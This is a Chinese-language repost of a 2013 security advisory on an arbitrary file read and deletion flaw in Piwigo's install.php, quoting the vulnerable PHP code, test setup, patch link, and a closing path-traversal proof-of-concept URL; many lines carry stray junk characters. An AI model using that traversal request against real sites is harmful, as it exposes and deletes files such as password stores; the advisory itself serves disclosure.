Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
9 o  b5 Y5 R" x$ |' q% [* d8 G
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
* O1 q6 y9 p3 Q1 {7 `====================================================================
/install.php:
4 D$ L: m) i8 N7 n4 T2 b$ E-------------
% b  c0 q$ Z; d6 t9 r" y1 ]113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
( I) F* N4 I) s' s9 f9 _. K( V114: {
' F; v3 H3 E$ F9 x115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
$ B- e# ]% G- I$ _7 s. w; Z4 s116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
! f* _' R0 U9 F4 h" D. v0 R! r118:   header('Content-Disposition: attachment; filename="database.inc.php"');
) Y: w# l; _4 P, R0 g119:   header('Content-Transfer-Encoding: binary');
. U5 `  {6 P: J  q; E/ m120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
2 t& q' E9 J+ R123:   exit();
124: }
====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
* \/ C) r! g# `# _5 v% k/ A9 ?           Apache 2.4.2 (Win32)
           PHP 5.4.4
0 M; U% ^7 ^0 C6 P           MySQL 5.5.25a
, \' @2 s. B5 n' v! S, |
1 d2 n0 F. B8 K7 E( F: VVulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
7 P! `* d' f. B' r) KVendor Patch: http://piwigo.org/bugs/view.php?id=2843

9 X& m( t. \/ I1 f9 I3 z15.02.2013

* w& M" S+ [2 n--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
" Q4 V6 X1 R9 e7 M# u
. h2 z  A0 b6 ~8 K, l/ M  n  s4 _8 X